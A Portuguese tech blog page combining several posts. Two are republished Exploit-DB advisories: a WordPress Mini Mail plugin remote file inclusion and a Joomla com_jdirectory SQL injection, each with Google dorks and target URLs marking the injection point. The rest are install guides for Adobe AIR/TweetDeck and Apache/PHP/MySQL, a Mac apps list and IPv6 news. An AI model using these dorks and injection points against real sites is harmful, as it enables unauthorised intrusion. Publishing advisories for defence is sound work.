WordPress Mini Mail Dashboard Widget Plugin 1.36 Remote File Inclusion

Standard


# Exploit Title: Mini Mail Dashboard Widget WordPress plugin RFI
# Google Dork: inurl:wp-content/plugins/mini-mail-dashboard-widget
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/mini-mail-dashboard-widget/download/
# Version: 1.36 (tested)


PoC

http://SERVER/WP_PATH/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=RFI (requires POSTing a file with ID wpmm-upload for this to work)


Vulnerable Code

if (isset($_FILES[‘wpmm-upload’])) {
// Create WordPress environmnt
require_once(urldecode($_REQUEST[‘abspath’]) . ‘wp-load.php’);

// Handle attachment
WPMiniMail::wpmm_upload();
}

Fonte: http://www.exploit-db.com/exploits/17868/

Como instalar o Adobe AIR e TweetDeck mais recentes no OpenSuse 11.4

Standard

Bom, pessoal, nós do AppUnix decidimos fazer um simples How to (bem easy-to-use mesmo) para que você possa instalar facilmente o Adobe Air junto com Tweetdeck sob OpenSuse 11.4. Sobre as notas de distribuição e hardware, nada tão gritante. Antes damos um alerta para quem “viaja” demais e instala Sistemas Operacionais Linux 64 bits quando NÃO SE TEM MAIS DE 4 gb de ram. Evite isto, pois Kernel PAE dá conta do recado e reconhece os 4gb de ram sob 32 bits com MUITO louvor.

Voltando ao ponto de specs, seguem abaixo:

Notebook Testado

Acer 7745 -> i3 350M, 4gb de ram.

Opensuse 11.4 32 bits.

Vamos que vamos?

Nosso primeiro passo é instalar o pacote RPM que está disposto no site da Adobe (pacote adobe air), Para baixar DIRETAMENTE acesse o link abaixo:

http://get.adobe.com/br/air/thankyou/?installer=Adobe_AIR_2.6_for_Linux_%28.rpm%29

Isto vai cair no site já para download.

Siga os passos abaixo:

adobeair passo 1

adobeair passo 1

Primeiro passo é dizer que queremos abrir o pacote com o gestor de pacotes RPM (mostrado acima).

adobeair passo 2

adobeair passo 2

Acima vemos o download prosseguindo (mesmo escolhendo ABRIR com gestor de pacotes RPM).

adobeair passo 3

adobeair passo 3

No passo acima vemos a execução do pacote baixado. Devemos clicar em INSTALAR para prosseguir.

adobeair passo 4

adobeair passo 4

No passo acima devemos confirmar que queremos instalar o pacote.

adobeair passo 5

adobeair passo 5

Devemos confirmar com nossa senha (senha de root do seu OpenSUSE 11.4) para autorizar a instalação do pacote.

adobeair passo 6

adobeair passo 6

Acima vemos o processo de instalação do adobe air rodando normalmente.

adobeair FINAL

adobeair FINAL

Para conferir que a instalação ocorreu filé clique em COMPUTADOR -> MAIS APLICATIVOS. Deve aparecer idêntico a foto acima.

Pronto, agora que metemos bala no Adobe Air, teremos de meter pólvora  (ou POIVA -> no interiorzão) no TweetDeck. Bora? Vamos na velocidade do dragão branco?

Primeiro passo é acessar o site oficial: http://www.tweetdeck.com/

tweetdeck passo 1

tweetdeck passo 1

Devemos clicar no menu COMPUTADOR para podermos baixar a versão DESKTOP.

tweetdeck passo 2

tweetdeck passo 2

Clicando em DOWNLOAD NOW iremos ativar o bichão (download dele). Devemos fazer isto para prosseguir com a instalação.

tweetdeck passo 3

tweetdeck passo 3

Veja o carregamento do arquivo direto no site.

tweetdeck passo 4

tweetdeck passo 4

Agora devemos clicar em ABRIR para baixar e usar o Adobe Air automaticamente na abertura dos arquivos.

tweetdeck passo 5

tweetdeck passo 5

Estamos terminando o download, falta pouco.

tweetdeck passo 6

tweetdeck passo 6

Agora iremos autorizar o Adobe Air a instalar o TweetDeck.

tweetdeck passo 7

tweetdeck passo 7

Estamos acima definindo o ponto de instalação do TweetDeck. Deveremos deixar o padrão, só confirme isto.

tweetdeck passo 8

tweetdeck passo 8

Acima devemos concordar com os termos da Adobe.

tweetdeck passo 9

tweetdeck passo 9

Conforme imagem acima, devemos colocar a senha de root do OpenSuse 11.4 afim de que seja autorizada a instalação/conclusão da instalação.

tweetdeck passo 10

tweetdeck passo 10

Depois disso é só ENJOY véi!

 

Curtiu? Aplique um SHARE nisso e se lhe salvou o dia comenta aí, please!

 

4ppUn1x agradece sua visita :P.

Joomla Component (com_jdirectory) SQL Injection Vulnerability

Standard


=====================================================================
.__ .__ __ .__ .___
____ ___ _________ | | ____ |__|/ |_ |__| __| _/
_/ __ \ / /____ | | / _ | __ ______ | |/ __ |
___/ > < | |_> > |_( ) || | /_____/ | / /_/ |
___ >__/_ | __/|____/____/|__||__| |______ |
/ /|__| /
Exploit-ID is the Exploit Information Disclosure

Web : exploit-id.com
e-mail : root[at]exploit-id[dot]com

#########################################
I’m Caddy-Dz, member of Exploit-Id
#########################################
======================================================================

####
# Exploit Title: Joomla Component com_jdirectory SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia[at]hotmail.com | Caddy-Dz[at]exploit-id.com
# Website: www.exploit-id.com
# Google Dork: inurl:/component/option,com_jdirectory
# Category:: Webapps
# Tested on: [Windows 7 Edition Intégral- French]
# Vendor: http://www.joomace.net/downloads/acesef/extensions/jdirectory-acesef
####

[*] ExpLo!T :

http://www.site.com/component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0

http://www.site.com/component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0 # Inject Here

####

[+] Peace From Algeria

####

=================================**Algerians Hackers**=======================================|
# Greets To : |
KedAns-Dz , Kalashinkov3 & **All Algerians Hackers** , jos_ali_joe , Z190T , |
All Exploit-Id Team , (exploit-id.com) , (1337day.com) , (dis9.com) , (exploit-db.com) |
All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer , MaaTar , St0fa , Nissou , |
RmZ …others |
============================================================================================ |

Fonte: http://www.exploit-db.com/exploits/17603/

Como instalar PHP, Apache e Mysql no Mac Os X Snow Leopard (mamp2 no mac)

Standard

Este é um artigo daqueles “easy-to-use”, aonde instalaremos o apache 2, o php 5 e o mysql 5 para que possamos programar sossegadamente (fazer um webserver para hospedar nossa aplicação localmente).
O sistema operacional usado aqui foi o Mac Os X Snow Leopard 10.6.7, mas o procedimento é o mesmo para 10.6.8.

Vamos para o fight?
Iremos usar o console do Mac os x, assim como o ports do Mac para gerenciar o trem com velocidade.
Façamos o seguinte, clique em terminal (veja a imagem abaixo):

como abrir terminais no mac os x

como abrir terminais no mac os x

Clicando lá você fará o seguinte:

Little-oaks-appunixlabs:~ sudo apachectl start

Isto fará com que você chame recursos globais como super usuário e ative o serviço do apache 2 dentro do seu Mac os x, LEMBRANDO que será requisitada a senha de superusuário para que você possa rodar este recurso, pois o sudo te dá poder de root para executar um determinado comando, como neste caso tomtamos o exemplo do apachectl.

Para conferir que o procedimento deu certo abra seu navegador web (no nosso caso curtimos muito o Mozilla Firefox, mas fica ao seu critério o navegador [isto não influenciará em nada neste how to]), conforme imagem abaixo, na barra de endereços digite

Apache ok

Apache ok

HTTP://localhost

Nosso segundo ponto e muito importante é entrar no arquivo de configuração do apache 2 afim de habilitarmos o suporte ao PHP, vamos por a mão na massa? Estamos usando o VIM, um editor muito eficaz e leve (todos que já amaram o vi um dia com certeza amam/amarão o vim):

Little-oaks-appunixlabs:~ sudo vim /etc/apache2/httpd.conf

 

Dentro deste arquivo devemos remover o comentário da linha abaixo:

LoadModule php5_module libexec/apache2/libphp5.so

Recomendo que aperte a tecla / no vim e digite php5, você já vai cair em cima da linha a ser descomentada, em seguida, no sinal de libra (#), caminhe até ele e aperte x
Isto nos deixará com suporte ao PHP, depois basta apertar ESC e digitar isto:
:wq!
Assim que pressionar ENTER o arquivo será salvo.
Vamos explicar o por que de :wq!

: representa comando para o arquivo
W representa ESCREVER
Q representa QUIT (sair)
! representa EXECUTAR as instruções informadas

Para finalizarmos o suporte ao php precisamos rodar o seguinte comando:

Little-oaks-appunixlabs:~ sudo apachectl restart

É mania de todos criar um arquivo com a função phpinfo() contida nele, porém, se fizermos isso “de cara” o apache vai exibir muitos warnings (interpretados pelo php) por questões de permissões e de existência do arquivo php.ini. Para sanarmos isto deveremos fazer o seguinte:

Little-oaks-appunixlabs:~ cd /etc
Little-oaks-appunixlabs: sudo cp php.ini.default php.ini
Little-oaks-appunixlabs: sudo chmod 666 php.ini

Estamos copiando o php.ini default do /etc (área de arquivos de configurações em Unix-like systems) e atribuindo permissões 666 (dono pode ler e escrever no arquivo, grupo também e demais também).
No arquivo php.ini temos de localizar o trecho aonde o TimeZone é identificado (mas está comentado). É muito importante mudar esta linha e ajustarmos nosso timezone corretamente, pois isto nos dará um horário adequado. Para isto devemos proceder da seguinte forma:
Little-oaks-appunixlabs: sudo vim php.ini
Em seguida aperte a tecla / para localizar um termo, informe o seguinte date.timezone, isto lhe deixará na linha acima da que precisamos mudar. Descomente a linha abaixo para que fique assim:
date.timezone =

Você removerá o ; apertando x em cima dele. Para deixarmos o vim em modo de edição de arquivos precisamos apertar a tecla i, isto nos dará poder de editar o arquivo (saindo de modo comando).
Agora iremos colocar depois do = o seguinte:
America/Sao_Paulo
Então o resultado final será —> date.timezone = America/Sao_Paulo
Dê ESC e digite
:wq!
Aperte ENTER e terá o arquivo salvo.

 

As vezes você pode estar se perguntando:

Poxa, mas meu timezone não tem nada a ver com o de Sampa, o que faço?
Relaxa, rapá! A galera do Appunix pensou em você! Abaixo segue a lista de timezone da América:
http://www.php.net/manual/en/timezones.america.php

Se mesmo assim não lhe agradar você pode usar os globais:
http://www.php.net/manual/en/timezones.others.php

Mas é impossível você não se agradar dos timezones da América, são repletos.
Os mais comuns que são usados são:
America/Porto_Velho
America/Noronha
America/Rio_Branco
America/Recife
America/Sao_Paulo
America/Porto_Acre
Mas escolha o que mais lhe agradar.

Assim que decidir qual seu TimeZone você deve reiniciar o apache para reler o php.ini e ativar o negócio:
Little-oaks-appunixlabs: sudo apachectl restart

Agora precisamos instalar o Mysql 5 para que possa trabalhar da forma que almejamos.
Para irmos direto ao ponto acesse o link abaixo:
http://dev.mysql.com/downloads/mysql/5.1.html#macosx-dmg
Se cuide para baixar a versão ideal para você.
Aí é 64 bits? Não sabe como é? Quer saber como seu Mac Os X Snow Leopard está operando? Clique na maça, depois clique em Sobre Este MAC, em seguida clique em Software (Categoria) e procure pela linha Kernel de 64-bit e Extensões: Sim (conforme a foto abaixo):

como ver informações do seu mac os x

como ver informações do seu mac os x

Caso seja Sim é 64 bits (x86_64), então baixe o pacote para 64 bits.
Vamos simbora?
Baixe o arquivo x86_64 no formato DMG.

baixar pacote mysql 64 bits (DMG)

baixar pacote mysql 64 bits (DMG)

Quando você clicar no formato DMG automaticamente o site da Mysql vai te convidar a logar-se lá com eles, mas basta prestar a atenção (conforme imagens abaixo) para não precisar perder tempo com esta burocracia, se você quer baixar direto (melhor Né?) basta fazer o seguinte, clique no link abaixo:
HTTP://dev.mysql.com/get/Downloads/MySQL-5.1/mysql-5.1.58-osx10.6-x86.dmg/form/http://mysql.cce.usp.br/
Deixa o download terminar siga os passos das fotos abaixo (literalmente instalar o mysql e seu ícone), Devemos concluir os passos extras para adição do Mysql como sendo parte do painel administrativo, para isto siga os passos abaixo:

passo1

passo1

 

Feito isto iremos confirmar se o mysql está rodando com o seguinte comando:

Little-oaks-appunixlabs: /usr/local/mysql/bin/mysql

Feito isto iremos reiniciar o apache 2 para garantir que o nosso servidor está integrando literalmente tudo, faremos com o seguinte comando:

Little-oaks-appunixlabs: sudo apachectl restart

Para conferirmos tudo vamos entrar dentro da nossa pasta pessoal, na pasta Sites e criar um arquivo chamado index.php. Dentro dele iremos colocar o seguinte (ISTO EM /Library/WebServer/Documents):
Ou seja -> sudo vim /Library/WebServer/Documents/index.php

< ?php phpinfo(); ?>

Teremos liberadas extensões como PDO (Muito boa para abstração no banco de dados mysql), Mysqli (a versão aprimorada do conector nativo do Mysql [somente disponível a partir do Mysql 5.x])
Pronto, feito isto instalamos o Mysql 5 , Php 5 e Apache 2 em nosso Mac Os X :D.
Abraços a todos e saibam que o AppUnix aprecia sua visita!

Top Aplicativos/Apps for Mac OS X Leopard | Snow Leopard

Standard

Olá galera tudo na paz?
Hoje por vias de necessidade, venho mostrar “Meus” top aplicativos/apps para Mac(sendo vários pagos e vários Free). Esclarecendo essa frase anterior, via de necessidade foi que nós (Mac users) conseguimos converter mais um usuário Linux  a começar tbm a trabalhar em nosso querido mundo da maça, eis ele Little_oak… em um churrasquinho nada planejado que fizemos no sábado passado, tive a honra e felicidade de transformar uma P5GCM+ Dual Core com um vídeo modesto (8500GT) e uma poderosa ilha de edição e desenvolvimento… que bate de frente com um iMac de 5k tranqüilamente.. mas vamos ao que interessa… eis uma foto do meu Dock….
Dock
Infelizmente ainda preciso por motivos alheios a minha vontade usar aplicativos/apps pagos….(eficiência e produtividade)

Explicando meu Dock da Esquerda pra Direita
1 – O primeiro Ícone é o cara, Finder tão misterioso quanto eficiente
Finder

2- Drashboard, tornou-se muito útil em minha vida quanto aprendi que existem widgets que que agilizam e muito na hora por exemplo de ver notícias, ler um lembrete, saber se meu MacBook está esquentando muito dentre outra funções.
DrashBoard

3 – Firefox, apesar de ultimamente esse danado estar muito guloso(comendo muita memória ram do meu branquinho) esse é um dos caras que não abro mão em meu dock.

FireFox

4 – Google Chrome, esse a cada dia tem conseguido espaço cativo em meu Dock, uma agilidade impressionante, sem contar que a cada dia seguem mais e mais puglins que facilitam nossas vidas…. Acredito que tenha cache interno(brincadeirinha, mas que parece… parece..)
Chrome

5 – Safari, não poderia deixar de cita-lo pois em suas últimas versões tem se mostrado também muito rápido e estável. Torna-se por sua vez uma ótima alternativa ao Firefox e Chrome.
Safari

6 – Get Tube, o próprio nome diz… puxar do youtube, esse ablativo tornou-se ecessêncial comecei no mundo Linux/Mac, no Brasil e em vários lugares do mundo temos pessoas com muito conhecimento para compartilhar… os vídeos do Youtube são uma ótima no que tange a qualquer assunto na área de Tecnologia.
GetTube

7 – Transmission, o meu preferido no mundo dos torrente, não tem espaço pra mais ninguém nessa área em meu Dock, muito rápido, intuitivo, aceita configurações que podem melhorar e muito a performance desse tipo de app, resumindo pode-se dizer que o melhor no mundo dos P2P(em minha modesta opinião e, tomando como base o uso de diversos de seus concorrentes).
Transmission

8 – Terminal, maior amigo do usuário Linux, excepcional, muito semelhante ao Terminal Linux com algumas particularidades, me atende muito bem no que diz respeito Gerenciamento de servidores Linux de clientes e resolver alguns problemas de permissão de forma rápida e eficiente.
Terminal

9 – CoRD, descoberto por acaso em uma busca por opções de aplicativos que utilizam RDP encontrei em um fórum gringo, pessoas elogiando esse app, resolvi teatral; surpreendentemente comporta-se MUITO melhor que Remote Desktop da Micro$oft ( que fica limitado pela falta de opções de configuração de vídeo, tamanho de tela, etc).
CoRD

10 – Chicken of the VNC, outro app encontrado em fórum gringo, muito rápido, estável  e eficiente para acesso em servidores/clientes que utilizam VNC Server… O melhor Viewer pra Mac OS X que já tive o prazer de usar. Nem mesmo o Real VNC Enterprise (Pago) foi tão eficiente em meus testes.
ChickenVNC

11 –  VLC, pra mim um aplicativo que não deveria ficar fora de lista de aplicativos ecencias de qualquer que seja o Sistema Operacional, seja nos nossos queridos Linux e Mac OS ou não tão querido assim Window$, esse é um player que atende com maestria aos propósitos a que se propõe.
VLC

Agora chegou a hora do lazer junto ao seu querido Mac, os próximos 8 itens são joguinhos para aqueles momentos de folga (poucos) da faculdade/trabalho.

12 – Pinbal HD, um joguinho bem leve que é bom pra relaxar e lembrar da infância, onde era faxinado com máquinas Pimbais… o nome por sí já diz tudo, um game Pimbal a altura do Mac OS X .
PinbalHD

13 – Rayman 3, jogo de um bonequinho sem braços e pernas ( possui somente cabeça e membros) que surgiu no final dos anos 90 e que desde aquela época onde meu tio Claudio possuía um 486 com 64Mb de Ram rodando um demo desse carrinha super simpático… desde aquela época me facina as histórias desse amiguinho esquisito.
Rayman3

14 – Word of Goo, joguinho bem interessante formado por melequinhas, VICIANTE…. com versões para Linux e Window$…. parece ser um jogo besta…. mas que na verdade é muito interessante e que faz perder noites e noites querendo passar de cada fase, não tenho certeza mas sugou primeiro no console Nintendo Wii.
WordofGoo

15 – Counter Strike 1.6, esse dispensa comentários…. faz parte do manual de sobrevivência de qualquer Geek/Nerd… um port simplesmente espetacular…. roda como nativo…. posso falar sem medo de errar que roda melhor que o Verdadeiro vindo do Window$.
CounterStrike

16 – Half Life 2, outré port viand do Window$ que me surpreendeu pelo desempenho e estabilidade, dispensa qualquer comentário.
HalfLife2

17 – Call of Duty 4 Modern Warfare, esse cara dispensa qualquer comentário, Game em primeira pessoa (first person shooter) com gráficos impressionantes, ótima jogabilidade e não é um port, é nativo para Mac OS X. Ultimamente tem sido meu maior hoby nos momentos de folga(pouquíssimos).
CallofDuty4

18 – Battlefield 1942, também jogo de tiro em primeira pessoa (first person shooter) que se passa durante a segunda Guerra Mundial, com gráficos e jogabilidades não tão bons quanto Call of Duty 4 Modern Warfare, mas que faz a alegria do pessoal que possui Macs com placas de vídeo modestas como as Intel GMA950 e GMA3100, que não rodaram com maestria os jogos da série Call of Duty , mas que rodaram totalmente bem esse Battlefield 1942 (uma ótima opção para Hardwares mais modestos, como os primeiros macs da série Intel).
BattleField1942

19 – Djay, App pra brincar de DJ de vez em quandovem festinhas simples… apesar de eu não usar todo poder desse carrinha, me parece que não fica atrás de outros aplicativos para mesma função.
Djay

20 – Toast Titanium, podemos dizer que é o Nero pra Mac OS X, grava de CD a Blue Ray … é um canivete suíço no que diz respeito a gravação de mídias.
ToastTitanium

21 – Taco HTML Edit, ótimo editor HTML que conheci faz pouco tempo, surgiu por necessidade de um aplicativo rápido e simples para criação/edição de páginas HTML na faculdade.
TacoHTML

22 – LibreOficce(BrOficce), apesar de meu MacBook ter vindo com Pacote Office da Micro$oft não me adaptei muito bem com o mesmo, logo que surgiu essa fork do OpenOficce instalei aqui no branquinho e estou completamente adaptado e, que me faz ganhar bastante tempo quando preciso utiliza-lo.Tradução.
LibreOficce

23 – Adobe Phoshop CS5, infelizmente ainda não possuímos uma ferramenta tão boa no mundo Open Source quanto o Photoshop, sinceramente espero que antes de minha morte consiga ver a Adobe desenvolvendo um Photoshop for Linux, seria uma revolução no mundo dos sofreares se isso acontecesse, só pra me explicar, o uso desse em meu Dock se dá pela eficiência e produtividade que me dão esse FANTÁSTICO aplicativo editor de imagens.
PhoshopCS5

24 – NO-IP, Serviço de Dns dinâmico muito conhecido por oferecer serviço de qualidade e gratuito. Dispensa comentários. Muitíssimo útil para quando deixo o MacBook em casa em preciso acessá-lo por algum motivo.
NO-IP

25 – VMware Fuzion, Aplicativo de virtualização de sistemas operacionais, o melhor…. quando preciso fazer alguma virtualização seja para uso do Window$ ou nosso amigo Linux, uso ele; que apesar de ser pago, vale cada centavo.
VMware

26 – Tweety Deck, cliente Twitter/Facebook que mostra em sua Mesa(Área de trabalho) notificações em tempo real referentes ao seu perfil no Facebook/Twitter, Não vivo sem ele!
Tweety

27 – Micr$oft Messeger, no quesito mensageiro instantâneo em minha modesta opinião ainda estamos longe de ter no mundo mac um aplicativo tão bom e estável como o Messeger da Micro$oft, Gostava muito do Pidgin mas após alguns desgostos e instabilidade em horas que necessitava agilidade e estabilidade abandonei o mesmo e passei a usar esse mensageiro que está em sua versão número 8 no mac OS X.
Messeger

28 – AppCleaner, aplicativo que nos ajuda na desisntalação de aplicativos no Mac OS X, desistala com eficiência qualquer app e suas dependências; diminuindo assima quantidade de “Lixo” em seu Mac após a desisntalação de aplicativos.
AppCleaner

Galera, esses são meus TOP aplicativos Ecencssiais. Me desculpem se não coloquei somente aplicativos opine source ou gratuitos… Desculpem também pelo tamanho do artigo, mas não poderia ser diferente…mas esses são os que realmente são ecenssiais a mim hoje.:D

Corrida contra o tempo já começa entre os grandes para implementação do IPV6

Standard

Google, Microsoft, Twitter, Facebook, eBay, Yahoo e Wikipedia sofrem cada vez mais pressão para se adequar ao novo protocolo da internet.

Cresce a pressão para que os sites mais populares da internet integrem suas redes ao IPv6, o tão aguardado upgrade do principal protocolo da internet, que atualmente está na versão 4.

E essa pressão foi elevada em mais um grau esta semana, com a notícia de que o Google ativou o suporte ao IPv6 para o site de vídeos YouTube. O Google já oferece acesso IPv6 a seu site de buscas e a muitos outros serviços da web.

Confira toda a matéria em:
http://br-linux.org/2010/o-que-7-gigantes-da-web-estao-fazendo-para-adotar-o-ipv6/